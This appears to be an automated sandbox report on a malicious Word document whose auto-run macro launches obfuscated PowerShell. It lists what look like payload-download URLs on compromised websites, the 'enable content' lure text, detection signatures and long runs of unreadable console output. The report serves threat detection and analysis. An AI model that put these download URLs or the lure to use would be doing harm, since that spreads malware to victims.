Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/marketing-digital/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/web-design/
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-conte
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/css/main.css
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/cover.webp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/favicon.webp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/js/main.js
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/COC-SITE.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/slideshow3.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/The-Stockton-Cafe-4-320x200.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site-1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/SITE3-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/SITE4-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/logo-site-2.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/mockDrop_iMac-on-a-table-1-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/2-1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/6.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/LETRA-CAIXA.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/10/Screenshot_2.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/10/ld-pierre-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_MISSAO.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VALORES.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VIS
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/MDF.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/METRO-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/XIMPRESSOES-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/quadro-led-luminoso-cerveja-redondo-duff-beer-44cm-
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/2.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/3.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/06/fachada_02_site.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/3.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/mockDrop_iMac-on-a-table-2-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/nizan-guanaes-propmark-55-anos-450x300.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/o-que-e-e-commerce.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/10.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/11.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/ACR
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec-450x300.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-includes/js/wp-embed.min.js
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-json/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://cairocad.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://cairocad.comp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:300
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117416892.0000000003C20000.00000004.00000001.sdmp	String found in binary or memory: https://physio-svdh.ch
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp	String found in binary or memory: https://physio-svdh.ch/wp-admin/kK/P
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.isatechnology.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.isatechnology.comp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2A

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443

E-Banking Fraud:

Drops certificate files (DER)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Very long command line found

Source: unknown	Process created: Commandline size = 7856
Source: unknown	Process created: Commandline size = 7765
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7765	Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FF00282FE9

4_2_000007FF00282FE9

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: v22Pc0qA.doc.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: v22Pc0qA.doc.doc

OLE indicator, VBA macros: true

Yara signature match

Source: 00000004.00000002.2110752047.00000000002D6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.2111601657.0000000001C34000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal96.troj.evad.winDOC@6/14@8/6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$2Pc0qA.doc.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC985.tmp

Jump to behavior

Source: v22Pc0qA.doc.doc

OLE indicator, Word Document stream: true

Source: v22Pc0qA.doc.doc	OLE document summary: title field not present or empty
Source: v22Pc0qA.doc.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............3........................... .=.......=.....................................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............3...h...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......X.v.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j....................................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j..... ..............................}..v............0.{.............X.v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E........................3.j....................................}..v....P.......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j....8.v.............................}..v............0.{...............v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............b2.j....................................}..v.....L......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............b2.j..... ..............................}..v....(M......0.{...............v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....................................}..v....@.......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....................................}..v....@.......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....................................}..v....@.......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....X.......0.{..............Bv.....(.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j....................................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.6.............}..v............0.{..............Bv.....$.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X ..............................}..v..... ......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....'......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X(..............................}..v.....(......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v...../......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X0..............................}..v.....0......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....7......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E..........................j....X8..............................}..v.....8......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X@..............................}..v.....@......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....G......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....XH..............................}..v.....H......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....O......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....XP..............................}..v.....P......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....W......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....XX..............................}..v.....X......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X`..............................}..v.....`......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....g......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....Xh..............................}..v.....h......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....o......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....Xp..............................}..v.....p......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....w......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....Xx..............................}..v.....x......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B......K....................... .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B......{....................... .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
